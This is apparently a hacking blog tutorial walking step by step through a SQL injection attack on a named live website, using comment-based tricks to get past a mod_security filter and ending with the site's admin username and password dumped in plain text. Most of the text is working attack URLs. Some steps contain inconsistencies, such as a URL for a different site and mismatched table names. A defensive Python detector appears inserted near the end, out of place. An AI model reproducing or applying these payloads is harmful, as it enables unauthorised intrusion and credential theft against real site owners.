SQL injection with a mod_security bypassing method!
Before reading this you must read about SQL injection!
I posted about it last time; click here to read it.

http://www.gogame.co.in/news.php?id=189
Now we will check whether this site is vulnerable to SQL injection or not!
Just add ' at the end of the site's URL!

http://www.gogame.co.in/news.php?id=189'

Nothing changed?

Try adding it before the number:
http://www.gogame.co.in/news.php?id=%27189

If still nothing happens to the page, leave the site and move to the next one!

But luckily I don't need to move to the next site; this site is vulnerable.

http://www.gogame.co.in/news.php?id=189'

By adding ' the result of the page changed!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by post DESC' at line 1

Now you can see this message on the page!

This means this site can be hacked!

------------------------------------------------------------------------------------------------
Step 2:
Finding the admin panel!
Now you need to find the admin panel of this site to log in as its administrator!
The admin panel is the area where the site's administrator logs in and maintains the site.
There are some tools available for this!
But for this tutorial I will use this online admin panel finder site:


Click here for the online admin panel finder

Now we will paste the site link there, which is http://www.gogame.co.in/, and click on dump!

It will start looking for the admin panel of the website; after 2 or 3 minutes it will give you the result of the process!
Now http://www.gogame.co.in/admin/ is in green and all the rest are red!
This means http://www.gogame.co.in/admin/ is the admin panel of this website!
Now open this page.

It is asking us to enter a username and password to log in!
We will find the username and password in the next step!
-------------------------------------------------------------------------------------------------
Step 3:
Now we need the username and password to log in, so we will use
http://www.gogame.co.in/news.php?id=189'
this section again! Now write:
http://www.gogame.co.in/news.php?id=189 order by 1--+-
Does the page remain the same?
http://www.gogame.co.in/news.php?id=189' order by 2--+-
Same?
Continue this until an error is displayed on the page!
http://www.gogame.co.in/news.php?id=189' order by 4--+-
Same!
http://www.area96.it/news.php?nws=61' order by 5--+-
Unknown column

This means there is no 5th column!
So there are 4 columns!

We have the column count; now we will find the vulnerable columns!
Write:

http://www.gogame.co.in/news.php?id=-189 union select 1,2,3,4--+-
Oops, 403 forbidden!
mod_security.
Now we will bypass this.
Actually, certain words are forbidden, like select!
When you hit enter the request has to go through the firewall, and since select is forbidden it will deny the request.
So we have to trick it by using our brain.
In the database, symbols like / * ! ` ~ ( ) are not supported!
So if we add an extra symbol with select, the firewall will allow it! That is how we trick it!

http://www.gogame.co.in/news.php?id=-189 union /*!select*/ 1,2,3,4--
Bypassed!

Now you can see 2, 3 and 4 on the page as the vulnerable columns!

These three numbers are displayed on the page, which means these three columns are vulnerable!
Now we will use these numbers to display the username and password of the website's admin panel on the page!

Now just change a little thing here!
Choose any number from the vulnerable columns and change it to "group_concat(table_name)",
like I do:
http://www.gogame.co.in/news.php?id=189 union select 1,group_concat(table_name),3,4--+-

and after the last column add "from Information_schema.tables",
like this:

http://www.gogame.co.in/news.php?id=189 union /*!select*/1,group_concat(table_name),3,4 from Information_schema.tables--+-

Now hit enter.
Oops,
again 403 forbidden!
We need to trick some more words!

http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,group_concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-

function group_concat does not exist O_o
It seems group_concat is not working, so we will use only concat now:

http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-

Bypassed.

Now instead of the number in column 2 it will show table names, like this one:

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET

This means it is showing us table names!
But we need the username and password, which are located in the website's database.

So we will use the database as well to extract the username and password!

http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-

Just add one more clause after information_schema.tables,

which is "where table_schema=database()",
like this:

http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables where table_schema=database()--+-

Now the page
is showing the database's tables!

Adminlogin

These are the tables.

Now we will send the query to open the adminlogin table!

Change "(table_name)" to "(column_name)",
"information_schema.tables" to "information_schema.columns",
"table_schema" to "table_name"
and "database()" to "login".

But it will not work, because it will not accept a table name after "table_name=".
So we need to trick the site:
we will use decimal numbers instead of the table name!
We will convert the word login to decimal numbers so it will accept it!

Click here for the ASCII converter


From here you can convert any word to hex, decimal and binary, so we will type l o g i n in the box of the ASCII converter!
Give a space between every letter of login, because the website needs spaced numbers!
Then click on convert!
It now shows us the result in the decimal box,
which is:
97 100 109 105 110 108 111 103 105 110
Now change it to:
CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)
Just add "CHAR" and a comma after every number!
Now we will use this instead of login!
So it will be:

http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(column_name)*/,3,4 from Information_schema/**/.columns where table_name=CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)--+-

Oops, again 403!
table_name is forbidden.
Bypass:

http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(column_name)*/,3,4 from Information_schema/**/.columns where /*!table_name*/=CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)--+-
The page shows the result:

usnd pdgame

This means these are the columns of the table adminlogin.

Now we will simply send the query to give us the username and password on the page!

Just change
"(column_name)" to "(usnd,0x3a,pdgame)"
and after "from" remove all the words and add "adminlogin".

0x3a is the hex form of : so that we get the username and password separated!
And it would be:
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(usnd,0x3a,pdgame)*/,3,4 from admin--+-

The page shows this result:

kolgo:gamekol

This means
the 1st user is:
username=kolgo
password=gamekol
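A defender-side illustration, added here and not part of the original post: a small Python normalizer that undoes the inline-comment and CHAR() obfuscation used throughout this walkthrough before matching SQL keywords, which is why a filter that blocklists the literal word select (as mod_security did here) is not a fix on its own. The sample request lines are constructed from the URLs in this post; the pattern names and thresholds are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request targets, modelled on the URLs in the post above.
SAMPLE_REQUESTS = [
    "/news.php?id=189",
    "/news.php?id=189'",
    "/news.php?id=189' order by 4--+-",
    "/news.php?id=-189 union /*!select*/ 1,2,3,4--",
    "/news.php?id=189 union /*!select*/ 1,concat/*!(column_name)*/,3,4 "
    "from Information_schema/**/.columns where /*!table_name*/="
    "CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)--+-",
]

VERSION_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)  # /*!select*/ -> select
EMPTY_COMMENT = re.compile(r"/\*.*?\*/", re.S)          # /**/ -> whitespace
CHAR_CALL = re.compile(r"\bchar\s*\(([\d\s,]+)\)", re.I)  # CHAR(97,...) -> 'a...'

# Keyword checks run on the normalized text, not on the raw request.
SQL_PATTERNS = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "schema_enum": re.compile(r"\binformation_schema\b"),
}


def normalize(value: str) -> str:
    """Undo URL encoding, MySQL version comments, empty comments and CHAR()."""
    value = unquote_plus(value)
    value = VERSION_COMMENT.sub(r" \1 ", value)
    value = EMPTY_COMMENT.sub(" ", value)
    value = CHAR_CALL.sub(
        lambda m: "'" + "".join(chr(int(n)) for n in m.group(1).split(",")) + "'",
        value,
    )
    return re.sub(r"\s+", " ", value).strip().lower()


def detect(request: str) -> list:
    """Return the names of injection indicators found in the query string."""
    query = request.split("?", 1)[1] if "?" in request else ""
    text = normalize(query)
    hits = [name for name, rx in SQL_PATTERNS.items() if rx.search(text)]
    if text.count("'") % 2 == 1:          # the lone ' used as the first probe
        hits.append("unbalanced_quote")
    return hits


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(detect(req) or "clean", "<-", req)
```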

Now that we have the password, we will move to the admin panel to hack the website.


Author: Mad Jack